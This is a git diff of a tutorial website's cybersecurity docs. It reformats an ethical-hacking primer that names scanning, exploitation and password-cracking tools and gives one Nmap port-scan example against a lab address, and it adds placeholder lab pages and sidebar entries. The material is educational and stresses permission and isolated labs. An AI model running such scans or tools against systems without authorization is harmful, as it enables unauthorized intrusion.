reuse it for web apps, networks, and cloud environments. @@ -62,52 +56,39 @@ Ethical hacking follows a repeatable lifecycle. Learn this like a recipe — you 8. **Retest** Confirm fixes are effective. ---- - -## 🧰 Common Tools (what ethical hackers use) +## Common Tools (what ethical hackers use) Below are the everyday tools you’ll learn to use. Use them only in authorized environments. -- **Nmap** — port scanning & service discovery (first step in enumeration). +* **Nmap** — port scanning & service discovery (first step in enumeration). Example (for a lab machine): `nmap -sV -p- 192.168.56.101` - -- **Wireshark** — packet capture and protocol analysis (learn how protocols look on the wire). - -- **Burp Suite** — web application proxy for inspecting and manipulating HTTP(S) traffic. - -- **Metasploit Framework** — exploitation framework and payload testing (use in lab only). - -- **Nikto / OpenVAS / Nessus** — vulnerability scanning (identify potential issues; validate manually). - -- **sqlmap** — automated SQL injection testing (lab-only; focus on learning detection & mitigation). - -- **John the Ripper / Hashcat** — password-cracking tools for assessing password strength on hashes you own. - -- **OWASP ZAP** — open-source web application scanner & proxy (great beginner tool). +* **Wireshark** — packet capture and protocol analysis (learn how protocols look on the wire). +* **Burp Suite** — web application proxy for inspecting and manipulating HTTP(S) traffic. +* **Metasploit Framework** — exploitation framework and payload testing (use in lab only). +* **Nikto / OpenVAS / Nessus** — vulnerability scanning (identify potential issues; validate manually). +* **sqlmap** — automated SQL injection testing (lab-only; focus on learning detection & mitigation). +* **John the Ripper / Hashcat** — password-cracking tools for assessing password strength on hashes you own. +* **OWASP ZAP** — open-source web application scanner & proxy (great beginner tool). This is not an exhaustive list — as you learn you’ll choose tools that fit the target and your workflow. ---- - -## 🧪 Lab Setup — a safe place to practice +## Lab Setup — a safe place to practice Never test on production. Build a sandbox using local virtual machines or cloud VMs you own. Minimal lab components: -- **Host machine**: your laptop/desktop. Use snapshots so you can revert. -- **Virtualization**: VirtualBox or VMware Workstation Player. -- **Attacker machine**: Kali Linux or any distro with pentest tools. -- **Victim machines/apps** (intentionally vulnerable): - - Metasploitable (legacy but instructive) - - OWASP Juice Shop (modern, web-app focused) - - DVWA (Damn Vulnerable Web App) for SQL/XSS practice - - Custom vulnerable containers or intentionally misconfigured VMs +* **Host machine**: your laptop/desktop. Use snapshots so you can revert. +* **Virtualization**: VirtualBox or VMware Workstation Player. +* **Attacker machine**: Kali Linux or any distro with pentest tools. +* **Victim machines/apps** (intentionally vulnerable): + * Metasploitable (legacy but instructive) + * OWASP Juice Shop (modern, web-app focused) + * DVWA (Damn Vulnerable Web App) for SQL/XSS practice + * Custom vulnerable containers or intentionally misconfigured VMs Keep your lab isolated from your home/office network (use host-only or internal network modes), so your testing can’t accidentally touch other devices. ---- - -## ✅ Practical, safe exercises (beginner → intermediate) +## Practical, safe exercises (beginner → intermediate) Each exercise should be done in your lab and accompanied by notes you’ll later use in a report. @@ -130,56 +111,41 @@ Each exercise should be done in your lab and accompanied by notes you’ll later 6. **Write a Short Report** - For one finding, write a concise report: summary, technical details, risk level, reproduction steps (safe), remediation steps, and suggested timeline. ---- - -## 🛡️ Defensive & Remediation Mindset +## Defensive & Remediation Mindset Ethical hacking is not just about finding issues — it’s about enabling fixes. When you find problems, think like a defender: -- What simple configuration change would block this attack? -- Can the vulnerability be mitigated by patching, or does it require code changes? -- What monitoring/alerts would detect exploitation attempts? -- What’s the least disruptive patch schedule for production systems? +* What simple configuration change would block this attack? +* Can the vulnerability be mitigated by patching, or does it require code changes? +* What monitoring/alerts would detect exploitation attempts? +* What’s the least disruptive patch schedule for production systems? Good remediation guidance is specific, prioritized, and cost-aware. ---- - -## 🧾 Reporting — your most important deliverable +## Reporting — your most important deliverable A good pentest report contains: -- Executive summary (non-technical, risk-focused) -- Technical details (reproduction steps, evidence, affected assets) -- Risk rating (e.g., High / Medium / Low) and business impact -- Concrete remediation steps and suggested testing after fixes -- Appendix with raw logs or screenshots (sanitized if needed) +* Executive summary (non-technical, risk-focused) +* Technical details (reproduction steps, evidence, affected assets) +* Risk rating (e.g., High / Medium / Low) and business impact +* Concrete remediation steps and suggested testing after fixes +* Appendix with raw logs or screenshots (sanitized if needed) Practice writing clear, usable reports — your findings are only valuable if the owner can act on them. ---- - -## 🧭 Career & Next Steps +## Career & Next Steps If you enjoy this path, consider: -- Learning deeper tools and platform-specific testing (cloud, mobile). -- Studying relevant certifications (e.g., OSCP, CEH, CompTIA PenTest+) when you have hands-on practice. -- Contributing to open-source security projects or building your own test cases and labs. - -Remember: curiosity + discipline + ethics = great security work. +* Learning deeper tools and platform-specific testing (cloud, mobile). +* Studying relevant certifications (e.g., OSCP, CEH, CompTIA PenTest+) when you have hands-on practice. +* Contributing to open-source security projects or building your own test cases and labs. ---- +**Remember:** $ curiosity + discipline + ethics = great security work $. -## ⚠️ Final Warning (again): Be Responsible +:::warning Be Responsible Ethical hacking is powerful. Always: -- Get permission in writing before testing any system you don’t own. -- Use controlled labs for learning. -- Respect data privacy and follow responsible disclosure processes. - ---- - -### ▶️ Next: -→ [Cybersecurity Tools ›](./cybersecurity-tools.mdx) -``` - -Would you like me to convert any of the hands-on exercises into step-by-step lab guides (with safe, lab-only commands and screenshots) you can drop directly into the `projects/` folder? +* Get permission in writing before testing any system you don’t own. +* Use controlled labs for learning. +* Respect data privacy and follow responsible disclosure processes. +::: diff --git a/docs/cybersecurity/index.mdx b/docs/cybersecurity/index.mdx index 8c19d3f..250c378 100644 --- a/docs/cybersecurity/index.mdx +++ b/docs/cybersecurity/index.mdx @@ -91,7 +91,7 @@ Start from the basics and move upward: 3. [Network Security Basics](./network-security-basics.mdx) 4. [Cryptography and Encryption](./cryptography-and-encryption.mdx) 5. [Ethical Hacking Basics](./ethical-hacking-basics.mdx) -6. [Cybersecurity Tools](./cybersecurity-tools.mdx) +6. [Cybersecurity Tools](/tutorial/cybersecurity/cybersecurity-tools) 7. [Incident Response](./incident-response.mdx) 8. [Best Practices](./best-practices.mdx) diff --git a/docs/cybersecurity/projects/network-sniffing-lab.mdx b/docs/cybersecurity/projects/network-sniffing-lab.mdx new file mode 100644 index 0000000..0d399cd --- /dev/null +++ b/docs/cybersecurity/projects/network-sniffing-lab.mdx @@ -0,0 +1,3 @@ +import ComingSoon from '@site/src/components/ComingSoon'; + + \ No newline at end of file diff --git a/docs/cybersecurity/projects/password-cracking-lab.mdx b/docs/cybersecurity/projects/password-cracking-lab.mdx new file mode 100644 index 0000000..0d399cd --- /dev/null +++ b/docs/cybersecurity/projects/password-cracking-lab.mdx @@ -0,0 +1,3 @@ +import ComingSoon from '@site/src/components/ComingSoon'; + + \ No newline at end of file diff --git a/docs/cybersecurity/projects/penetration-testing-lab.mdx b/docs/cybersecurity/projects/penetration-testing-lab.mdx new file mode 100644 index 0000000..0d399cd --- /dev/null +++ b/docs/cybersecurity/projects/penetration-testing-lab.mdx @@ -0,0 +1,3 @@ +import ComingSoon from '@site/src/components/ComingSoon'; + + \ No newline at end of file diff --git a/docs/cybersecurity/projects/setup-lab-environment.mdx b/docs/cybersecurity/projects/setup-lab-environment.mdx new file mode 100644 index 0000000..0d399cd --- /dev/null +++ b/docs/cybersecurity/projects/setup-lab-environment.mdx @@ -0,0 +1,3 @@ +import ComingSoon from '@site/src/components/ComingSoon'; + + \ No newline at end of file diff --git a/docs/cybersecurity/projects/sql-injection-demo.mdx b/docs/cybersecurity/projects/sql-injection-demo.mdx new file mode 100644 index 0000000..0d399cd --- /dev/null +++ b/docs/cybersecurity/projects/sql-injection-demo.mdx @@ -0,0 +1,3 @@ +import ComingSoon from '@site/src/components/ComingSoon'; + + \ No newline at end of file diff --git a/docs/cybersecurity/resources/books-and-courses.mdx b/docs/cybersecurity/resources/books-and-courses.mdx new file mode 100644 index 0000000..0d399cd --- /dev/null +++ b/docs/cybersecurity/resources/books-and-courses.mdx @@ -0,0 +1,3 @@ +import ComingSoon from '@site/src/components/ComingSoon'; + + \ No newline at end of file diff --git a/docs/cybersecurity/resources/glossary.mdx b/docs/cybersecurity/resources/glossary.mdx new file mode 100644 index 0000000..0d399cd --- /dev/null +++ b/docs/cybersecurity/resources/glossary.mdx @@ -0,0 +1,3 @@ +import ComingSoon from '@site/src/components/ComingSoon'; + + \ No newline at end of file diff --git a/docs/cybersecurity/resources/links.mdx b/docs/cybersecurity/resources/links.mdx new file mode 100644 index 0000000..0d399cd --- /dev/null +++ b/docs/cybersecurity/resources/links.mdx @@ -0,0 +1,3 @@ +import ComingSoon from '@site/src/components/ComingSoon'; + + \ No newline at end of file diff --git a/docs/cybersecurity/resources/tools-list.mdx b/docs/cybersecurity/resources/tools-list.mdx new file mode 100644 index 0000000..0d399cd --- /dev/null +++ b/docs/cybersecurity/resources/tools-list.mdx @@ -0,0 +1,3 @@ +import ComingSoon from '@site/src/components/ComingSoon'; + + \ No newline at end of file diff --git a/docs/index.mdx b/docs/index.mdx index e8750b7..0993c5b 100644 --- a/docs/index.mdx +++ b/docs/index.mdx @@ -58,15 +58,15 @@ We cover topics including **Frontend**, **Backend**, **AI**, **Data Science**, a - +

Learn the building blocks of the web — HTML. Understand tags, attributes, forms, and layout fundamentals to create structured webpages.

 - +

Master styling with CSS. Learn Flexbox, Grid, animations, and responsive design techniques for beautiful interfaces.

 - +

From basics to advanced — learn JavaScript programming, DOM manipulation, and ES6+ features to bring interactivity to your projects.

 diff --git a/docusaurus.config.js b/docusaurus.config.js index d5fefbc..06395d3 100644 --- a/docusaurus.config.js +++ b/docusaurus.config.js @@ -137,13 +137,13 @@ const config = { value: `
- HTML - CSS - JavaScript - Git - GitHub - React - Cyber Security + HTML + CSS + JavaScript + Git + GitHub + React + Cyber Security
`, }, diff --git a/sidebars.ts b/sidebars.ts index 8751282..c0b3942 100644 --- a/sidebars.ts +++ b/sidebars.ts @@ -458,7 +458,6 @@ const sidebars: SidebarsConfig = { label: "Cybersecurity", href: "/cybersecurity/", }, - ], css: [ @@ -822,37 +821,100 @@ const sidebars: SidebarsConfig = { ], }, - // { - // type: 'category', - // label: 'Cybersecurity Tools', - // link: { type: 'doc', id: 'cybersecurity/cybersecurity-tools' }, - // items: [], - // }, - - // { - // type: 'category', - // label: 'Hands-on Projects', - // link: { type: 'generated-index', title: 'Cybersecurity Projects & Labs' }, - // items: [ - // 'cybersecurity/projects/setup-lab-environment', - // 'cybersecurity/projects/sql-injection-demo', - // 'cybersecurity/projects/password-cracking-lab', - // 'cybersecurity/projects/network-sniffing-lab', - // 'cybersecurity/projects/penetration-testing-lab', - // ], - // }, - - // { - // type: 'category', - // label: 'Resources', - // link: { type: 'generated-index', title: 'Cybersecurity Learning Resources' }, - // items: [ - // 'cybersecurity/resources/glossary', - // 'cybersecurity/resources/books-and-courses', - // 'cybersecurity/resources/tools-list', - // 'cybersecurity/resources/links', - // ], - // }, + { + type: "category", + label: "Cybersecurity Tools", + link: { type: "doc", id: "cybersecurity/cybersecurity-tools/index" }, + items: [ + { + type: "category", + label: "Network Analysis", + items: [ + "cybersecurity/cybersecurity-tools/network-analysis/wireshark-basics", + "cybersecurity/cybersecurity-tools/network-analysis/nmap-scanning", + "cybersecurity/cybersecurity-tools/network-analysis/tcpdump-guide", + ], + }, + { + type: "category", + label: "Penetration Testing", + items: [ + "cybersecurity/cybersecurity-tools/penetration-testing/metasploit-framework", + "cybersecurity/cybersecurity-tools/penetration-testing/burpsuite-overview", + "cybersecurity/cybersecurity-tools/penetration-testing/nikto-scanning", + ], + }, + { + type: "category", + label: "Password & Authentication", + items: [ + "cybersecurity/cybersecurity-tools/password-and-authentication/john-the-ripper", + "cybersecurity/cybersecurity-tools/password-and-authentication/hydra-password-cracking", + "cybersecurity/cybersecurity-tools/password-and-authentication/hashcat-usage", + ], + }, + { + type: "category", + label: "Digital Forensics", + items: [ + "cybersecurity/cybersecurity-tools/digital-forensics/autopsy-introduction", + "cybersecurity/cybersecurity-tools/digital-forensics/volatility-memory-analysis", + ], + }, + { + type: "category", + label: "Vulnerability Assessment", + items: [ + "cybersecurity/cybersecurity-tools/vulnerability-assessment/openvas-setup", + "cybersecurity/cybersecurity-tools/vulnerability-assessment/nessus-basics", + "cybersecurity/cybersecurity-tools/vulnerability-assessment/vulnerability-scanning-tips", + ], + }, + { + type: "category", + label: "Monitoring & Defense", + items: [ + "cybersecurity/cybersecurity-tools/monitoring-and-defense/splunk-overview", + "cybersecurity/cybersecurity-tools/monitoring-and-defense/snort-ids", + "cybersecurity/cybersecurity-tools/monitoring-and-defense/security-onion", + ], + }, + ], + }, + + { + type: "category", + label: "Hands-on Projects", + link: { + type: "generated-index", + title: "Cybersecurity Projects & Labs", + description: `Hands-on projects and lab exercises to build practical cybersecurity skills. Start with guided, safe labs (network analysis, web app testing, password cracking, forensics), progress to intermediate attack/defense scenarios, and finish with real-world capstone projects. Each lab includes objectives, required tools, step-by-step instructions, and remediation guidance, perfect for learners, instructors, and bootcamps.`, + }, + + items: [ + "cybersecurity/projects/setup-lab-environment", + "cybersecurity/projects/sql-injection-demo", + "cybersecurity/projects/password-cracking-lab", + "cybersecurity/projects/network-sniffing-lab", + "cybersecurity/projects/penetration-testing-lab", + ], + }, + + { + type: "category", + label: "Resources", + link: { + type: "generated-index", + title: "Cybersecurity Learning Resources", + description: `A practical, hands-on collection of learning resources for everyone building real-world cybersecurity skills. This index groups tutorials, tool guides, labs, and checklists organized from fundamentals (networking, cryptography, web security) to offensive and defensive workflows (pentesting, DFIR, incident response). Each entry includes clear objectives, step‑by‑step exercises, and ethics-first guidance so you can practice safely in labs and apply what you learn to production-ready security work. Use the "Getting Started" path to move from beginner-friendly topics to specialized tool tutorials and certification-ready material.`, + }, + items: [ + 'cybersecurity/resources/glossary', + 'cybersecurity/resources/books-and-courses', + 'cybersecurity/resources/tools-list', + 'cybersecurity/resources/links', + ], + }, ], };